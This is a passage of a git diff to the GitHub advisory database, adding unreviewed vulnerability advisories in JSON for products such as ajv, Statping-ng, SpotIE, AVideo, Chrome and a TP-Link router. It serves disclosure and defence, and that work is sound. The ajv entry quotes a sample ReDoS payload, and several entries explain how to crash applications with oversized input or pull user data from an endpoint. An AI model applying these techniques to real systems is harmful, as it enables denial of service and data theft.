.../GHSA-64v7-64h5-r58h.json | 48 ++++++++++++++++ .../GHSA-659g-9v9q-gq45.json | 3 +- .../GHSA-684h-gqgj-c42j.json | 3 +- .../GHSA-6m88-cmrp-47r3.json | 6 +- .../GHSA-6p6h-r7gh-4hj6.json | 52 +++++++++++++++++ .../GHSA-6r9h-3c6p-4chm.json | 37 ++++++++++++ .../GHSA-6vgg-p398-7vm9.json | 48 ++++++++++++++++ .../GHSA-7679-g48g-fxpc.json | 3 +- .../GHSA-7ghp-xq34-m769.json | 3 +- .../GHSA-7j3c-f9r5-fc2v.json | 3 +- .../GHSA-7pgr-rh5j-x824.json | 48 ++++++++++++++++ .../GHSA-7vv3-8qfv-xjc7.json | 3 +- .../GHSA-8575-qvr6-9797.json | 6 +- .../GHSA-862j-qqj8-4qr6.json | 48 ++++++++++++++++ .../GHSA-87p4-fg9r-8pmj.json | 48 ++++++++++++++++ .../GHSA-8gp8-wgcp-qxqq.json | 48 ++++++++++++++++ .../GHSA-8jg3-vm8w-m4r8.json | 29 ++++++++++ .../GHSA-8q42-rp7q-f493.json | 3 +- .../GHSA-8wgf-f4hv-w5qc.json | 52 +++++++++++++++++ .../GHSA-96g7-r737-95hv.json | 33 +++++++++++ .../GHSA-975r-cfgj-8mhf.json | 48 ++++++++++++++++ .../GHSA-98w9-x492-wwm5.json | 48 ++++++++++++++++ .../GHSA-9cgv-px49-jxx3.json | 3 +- .../GHSA-9h9g-xpmp-46vg.json | 3 +- .../GHSA-9jqj-4cr8-rr2f.json | 3 +- .../GHSA-9m5j-8278-v84q.json | 6 +- .../GHSA-9q2m-h66x-q8hw.json | 3 +- .../GHSA-9qmm-fmp8-wcfp.json | 5 +- .../GHSA-c37x-p7mp-hh29.json | 33 +++++++++++ .../GHSA-cp9m-vc98-h8c6.json | 3 +- .../GHSA-cx65-rpp3-qf6c.json | 37 ++++++++++++ .../GHSA-f9c8-6hr7-729r.json | 52 +++++++++++++++++ .../GHSA-fh73-r4jx-8p6f.json | 3 +- .../GHSA-fmmr-xg7j-x2cq.json | 6 +- .../GHSA-fqw7-jxvw-p9pw.json | 6 +- .../GHSA-frff-9f6h-44cx.json | 6 +- .../GHSA-g587-3qp8-6jq6.json | 48 ++++++++++++++++ .../GHSA-g74q-8phg-6q8x.json | 3 +- .../GHSA-g7hj-9w6f-45m2.json | 6 +- .../GHSA-gcwg-27rq-5w54.json | 48 ++++++++++++++++ .../GHSA-gfgw-92mr-c3gr.json | 3 +- .../GHSA-gfr2-w843-rf3v.json | 3 +- .../GHSA-gg4v-3p7w-7vc6.json | 48 ++++++++++++++++ .../GHSA-gvjm-pmwp-75mw.json | 33 +++++++++++ .../GHSA-h5fh-q8gg-2c8w.json | 3 +- .../GHSA-h6v2-x2pp-qx2r.json | 48 ++++++++++++++++ .../GHSA-h9c8-jr46-gp7p.json | 33 +++++++++++ .../GHSA-hgh5-fxqq-8cf2.json | 3 +- .../GHSA-hpj8-5pv7-f58m.json | 35 ++++++++++++ .../GHSA-hwwj-gxrj-23x7.json | 48 ++++++++++++++++ .../GHSA-hx6f-whrw-7w7f.json | 6 +- .../GHSA-j3r9-x7xr-wvfg.json | 1 + .../GHSA-j4g3-xg56-p22g.json | 48 ++++++++++++++++ .../GHSA-jm8f-9g3r-g5w9.json | 6 +- .../GHSA-jrmw-6fvh-x39j.json | 3 +- .../GHSA-jxfc-7j9j-8gg7.json | 52 +++++++++++++++++ .../GHSA-m6gh-m58m-pj6h.json | 48 ++++++++++++++++ .../GHSA-m7rx-q9f3-3p96.json | 40 +++++++++++++ .../GHSA-m8px-gwxq-5mx8.json | 6 +- .../GHSA-mh97-cxwp-x3wq.json | 48 ++++++++++++++++ .../GHSA-mm49-f397-87mj.json | 48 ++++++++++++++++ .../GHSA-mqpv-gcv6-r5w9.json | 48 ++++++++++++++++ .../GHSA-mw3g-2cmq-pj57.json | 41 ++++++++++++++ .../GHSA-p32m-p89x-93gw.json | 52 +++++++++++++++++ .../GHSA-p3cm-cp3w-xm62.json | 48 ++++++++++++++++ .../GHSA-p866-9g89-mc5v.json | 6 +- .../GHSA-pc84-8mjq-pcg8.json | 3 +- .../GHSA-pf56-pmmh-5pxf.json | 48 ++++++++++++++++ .../GHSA-pmq3-mh37-3fc8.json | 48 ++++++++++++++++ .../GHSA-pp78-hqqc-jrrq.json | 40 +++++++++++++ .../GHSA-pqwv-wwjj-f9gv.json | 48 ++++++++++++++++ .../GHSA-pw6x-8hxj-hv8c.json | 3 +- .../GHSA-q3c5-6hmj-6999.json | 48 ++++++++++++++++ .../GHSA-q5vh-ff4q-5j62.json | 6 +- .../GHSA-q8w6-j65f-cxr6.json | 3 +- .../GHSA-q922-v4r9-2x72.json | 3 +- .../GHSA-qhpc-j29f-q7jq.json | 6 +- .../GHSA-qpgr-f49w-gfpx.json | 52 +++++++++++++++++ .../GHSA-qprx-jf5f-fhhx.json | 40 +++++++++++++ .../GHSA-qxf4-rqx4-9mqj.json | 52 +++++++++++++++++ .../GHSA-r2c7-m48p-r86q.json | 48 ++++++++++++++++ .../GHSA-r2ww-vx8x-gqmg.json | 48 ++++++++++++++++ .../GHSA-r7qg-5929-634m.json | 48 ++++++++++++++++ .../GHSA-r8f8-4pgh-4m8v.json | 44 +++++++++++++++ .../GHSA-rccq-h9rv-fmqp.json | 6 +- .../GHSA-rj79-m8w5-gpw8.json | 33 +++++++++++ .../GHSA-rjm9-mq62-f4fp.json | 3 +- .../GHSA-rm7q-jj78-qfc9.json | 3 +- .../GHSA-rr27-5cg7-jpp5.json | 41 ++++++++++++++ .../GHSA-v4x7-pcc8-pj6q.json | 48 ++++++++++++++++ .../GHSA-v7gv-95cv-hv8j.json | 48 ++++++++++++++++ .../GHSA-vf6g-mr63-q5rh.json | 48 ++++++++++++++++ .../GHSA-vjxh-723c-34mp.json | 6 +- .../GHSA-vr5h-9ppx-x962.json | 48 ++++++++++++++++ .../GHSA-vwfg-jcqm-ff7v.json | 3 +- .../GHSA-w4mj-mj22-jm3c.json | 3 +- .../GHSA-w5c2-6978-qx5h.json | 48 ++++++++++++++++ .../GHSA-w79v-5572-69vq.json | 56 +++++++++++++++++++ .../GHSA-w8gr-fpp3-xwvp.json | 3 +- .../GHSA-w8v5-vhqr-4h9v.json | 33 +++++++++++ .../GHSA-wcfp-f743-hjm5.json | 38 +++++++++++++ .../GHSA-x4w3-c999-4989.json | 6 +- .../GHSA-x983-7w29-6j6h.json | 2 +- .../GHSA-xfxm-p3px-phfr.json | 48 ++++++++++++++++ .../GHSA-xm63-5pjx-vrhp.json | 44 +++++++++++++++ .../GHSA-xmrx-grvp-76w7.json | 3 +- 133 files changed, 3410 insertions(+), 62 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2ffm-9xhq-mwc8/GHSA-2ffm-9xhq-mwc8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-349p-7f27-qvx8/GHSA-349p-7f27-qvx8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-34wv-c7h9-3524/GHSA-34wv-c7h9-3524.json create mode 100644 advisories/unreviewed/2026/02/GHSA-35f2-992w-gmjg/GHSA-35f2-992w-gmjg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3745-9rxm-69m7/GHSA-3745-9rxm-69m7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3fc2-jfpg-8jg5/GHSA-3fc2-jfpg-8jg5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3mf8-2573-7cx8/GHSA-3mf8-2573-7cx8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-42ww-368q-gjw4/GHSA-42ww-368q-gjw4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-44j4-34hp-pwwr/GHSA-44j4-34hp-pwwr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4r9x-qh7r-9qv9/GHSA-4r9x-qh7r-9qv9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4w34-9hcr-4jm4/GHSA-4w34-9hcr-4jm4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-64v7-64h5-r58h/GHSA-64v7-64h5-r58h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6p6h-r7gh-4hj6/GHSA-6p6h-r7gh-4hj6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6vgg-p398-7vm9/GHSA-6vgg-p398-7vm9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7pgr-rh5j-x824/GHSA-7pgr-rh5j-x824.json create mode 100644 advisories/unreviewed/2026/02/GHSA-862j-qqj8-4qr6/GHSA-862j-qqj8-4qr6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87p4-fg9r-8pmj/GHSA-87p4-fg9r-8pmj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8gp8-wgcp-qxqq/GHSA-8gp8-wgcp-qxqq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8wgf-f4hv-w5qc/GHSA-8wgf-f4hv-w5qc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-975r-cfgj-8mhf/GHSA-975r-cfgj-8mhf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-98w9-x492-wwm5/GHSA-98w9-x492-wwm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f9c8-6hr7-729r/GHSA-f9c8-6hr7-729r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g587-3qp8-6jq6/GHSA-g587-3qp8-6jq6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcwg-27rq-5w54/GHSA-gcwg-27rq-5w54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gg4v-3p7w-7vc6/GHSA-gg4v-3p7w-7vc6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h6v2-x2pp-qx2r/GHSA-h6v2-x2pp-qx2r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hwwj-gxrj-23x7/GHSA-hwwj-gxrj-23x7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j4g3-xg56-p22g/GHSA-j4g3-xg56-p22g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jxfc-7j9j-8gg7/GHSA-jxfc-7j9j-8gg7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m6gh-m58m-pj6h/GHSA-m6gh-m58m-pj6h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mh97-cxwp-x3wq/GHSA-mh97-cxwp-x3wq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mm49-f397-87mj/GHSA-mm49-f397-87mj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mqpv-gcv6-r5w9/GHSA-mqpv-gcv6-r5w9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mw3g-2cmq-pj57/GHSA-mw3g-2cmq-pj57.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p32m-p89x-93gw/GHSA-p32m-p89x-93gw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p3cm-cp3w-xm62/GHSA-p3cm-cp3w-xm62.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pf56-pmmh-5pxf/GHSA-pf56-pmmh-5pxf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pmq3-mh37-3fc8/GHSA-pmq3-mh37-3fc8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pp78-hqqc-jrrq/GHSA-pp78-hqqc-jrrq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pqwv-wwjj-f9gv/GHSA-pqwv-wwjj-f9gv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q3c5-6hmj-6999/GHSA-q3c5-6hmj-6999.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qpgr-f49w-gfpx/GHSA-qpgr-f49w-gfpx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qprx-jf5f-fhhx/GHSA-qprx-jf5f-fhhx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r2c7-m48p-r86q/GHSA-r2c7-m48p-r86q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r2ww-vx8x-gqmg/GHSA-r2ww-vx8x-gqmg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r7qg-5929-634m/GHSA-r7qg-5929-634m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r8f8-4pgh-4m8v/GHSA-r8f8-4pgh-4m8v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rj79-m8w5-gpw8/GHSA-rj79-m8w5-gpw8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v4x7-pcc8-pj6q/GHSA-v4x7-pcc8-pj6q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v7gv-95cv-hv8j/GHSA-v7gv-95cv-hv8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vf6g-mr63-q5rh/GHSA-vf6g-mr63-q5rh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vr5h-9ppx-x962/GHSA-vr5h-9ppx-x962.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w5c2-6978-qx5h/GHSA-w5c2-6978-qx5h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w79v-5572-69vq/GHSA-w79v-5572-69vq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wcfp-f743-hjm5/GHSA-wcfp-f743-hjm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xfxm-p3px-phfr/GHSA-xfxm-p3px-phfr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xm63-5pjx-vrhp/GHSA-xm63-5pjx-vrhp.json diff --git a/advisories/unreviewed/2026/01/GHSA-82cg-rxq8-hc7m/GHSA-82cg-rxq8-hc7m.json b/advisories/unreviewed/2026/01/GHSA-82cg-rxq8-hc7m/GHSA-82cg-rxq8-hc7m.json index a817690dfc084..41337323f5ab1 100644 --- a/advisories/unreviewed/2026/01/GHSA-82cg-rxq8-hc7m/GHSA-82cg-rxq8-hc7m.json +++ b/advisories/unreviewed/2026/01/GHSA-82cg-rxq8-hc7m/GHSA-82cg-rxq8-hc7m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-82cg-rxq8-hc7m", - "modified": "2026-01-29T09:31:49Z", + "modified": "2026-02-11T21:30:29Z", "published": "2026-01-29T09:31:49Z", "aliases": [ "CVE-2026-23563" diff --git a/advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json b/advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json new file mode 100644 index 0000000000000..d3b27dc3560dd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-238q-xh37-pmhj/GHSA-238q-xh37-pmhj.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-238q-xh37-pmhj", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2024-26477" + ], + "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the api parameter of the oauth, amazon_sns, export endpoints.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26477" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc/tree/main/CVE-2024-26477" + }, + { + "type": "WEB", + "url": "https://github.com/statping-ng/statping-ng" + }, + { + "type": "WEB", + "url": "https://statping-ng.github.io" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T20:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-28wx-v484-3qch/GHSA-28wx-v484-3qch.json b/advisories/unreviewed/2026/02/GHSA-28wx-v484-3qch/GHSA-28wx-v484-3qch.json index 6aad0b6b8482a..50c452e09d237 100644 --- a/advisories/unreviewed/2026/02/GHSA-28wx-v484-3qch/GHSA-28wx-v484-3qch.json +++ b/advisories/unreviewed/2026/02/GHSA-28wx-v484-3qch/GHSA-28wx-v484-3qch.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-28wx-v484-3qch", - "modified": "2026-02-08T15:30:58Z", + "modified": "2026-02-11T21:30:35Z", "published": "2026-02-08T15:30:58Z", "aliases": [ "CVE-2026-2152" @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-2ffm-9xhq-mwc8/GHSA-2ffm-9xhq-mwc8.json b/advisories/unreviewed/2026/02/GHSA-2ffm-9xhq-mwc8/GHSA-2ffm-9xhq-mwc8.json new file mode 100644 index 0000000000000..aa5bc88f76eec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2ffm-9xhq-mwc8/GHSA-2ffm-9xhq-mwc8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2ffm-9xhq-mwc8", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37210" + ], + "details": "SpotIE 2.9.5 contains a denial of service vulnerability in the registration key input that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the 'Key' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37210" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47855" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotie-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/unreviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json new file mode 100644 index 0000000000000..52c1afe474f6a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2g4f-4pwh-qvx6", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2025-69873" + ], + "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the $data option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax ($data reference), which is passed directly to the JavaScript RegExp() constructor without validation. An attacker can inject a malicious regex pattern (e.g., \"^(a|a)*$\") combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with $data: true for dynamic schema validation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873" + }, + { + "type": "WEB", + "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json b/advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json new file mode 100644 index 0000000000000..05f51ee8a6dd9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2prw-jcj2-h5xf", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2026-2318" + ], + "details": "Inappropriate implementation in PictureInPicture in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2318" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/363930141" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-32vw-wgfh-pxr5/GHSA-32vw-wgfh-pxr5.json b/advisories/unreviewed/2026/02/GHSA-32vw-wgfh-pxr5/GHSA-32vw-wgfh-pxr5.json index c55a73aeb8937..00face5182143 100644 --- a/advisories/unreviewed/2026/02/GHSA-32vw-wgfh-pxr5/GHSA-32vw-wgfh-pxr5.json +++ b/advisories/unreviewed/2026/02/GHSA-32vw-wgfh-pxr5/GHSA-32vw-wgfh-pxr5.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-32vw-wgfh-pxr5", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:51Z", "aliases": [ "CVE-2025-62501" ], "details": "SSH Hostkey misconfiguration vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows attackers to obtain device credentials through a specially crafted man‑in‑the‑middle (MITM) attack. This could enable unauthorized access if captured credentials are reused.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-349p-7f27-qvx8/GHSA-349p-7f27-qvx8.json b/advisories/unreviewed/2026/02/GHSA-349p-7f27-qvx8/GHSA-349p-7f27-qvx8.json new file mode 100644 index 0000000000000..8c2281a9bae11 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-349p-7f27-qvx8/GHSA-349p-7f27-qvx8.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-349p-7f27-qvx8", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37173" + ], + "details": "AVideo Platform 8.1 contains an information disclosure vulnerability that allows attackers to enumerate user details through the playlistsFromUser.json.php endpoint. Attackers can retrieve sensitive user information including email, password hash, and administrative status by manipulating the users_id parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37173" + }, + { + "type": "WEB", + "url": "https://avideo.com" + }, + { + "type": "WEB", + "url": "https://github.com/WWBN/AVideo" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47997" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/avideo-platform-information-disclosure-user-enumeration" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-359" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-34wv-c7h9-3524/GHSA-34wv-c7h9-3524.json b/advisories/unreviewed/2026/02/GHSA-34wv-c7h9-3524/GHSA-34wv-c7h9-3524.json new file mode 100644 index 0000000000000..974404f624ddf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-34wv-c7h9-3524/GHSA-34wv-c7h9-3524.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34wv-c7h9-3524", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37212" + ], + "details": "SpotMSN 2.4.6 contains a denial of service vulnerability in the registration name input field that allows attackers to crash the application. Attackers can generate a 1000-character payload and paste it into the 'Name' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37212" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47869" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotmsn-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-35f2-992w-gmjg/GHSA-35f2-992w-gmjg.json b/advisories/unreviewed/2026/02/GHSA-35f2-992w-gmjg/GHSA-35f2-992w-gmjg.json new file mode 100644 index 0000000000000..fdfe589877f06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-35f2-992w-gmjg/GHSA-35f2-992w-gmjg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-35f2-992w-gmjg", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37208" + ], + "details": "SpotFTP 3.0.0.0 contains a buffer overflow vulnerability in the registration key input field that allows attackers to crash the application. Attackers can generate a 1000-character payload and paste it into the 'Key' field to trigger an application crash and denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": 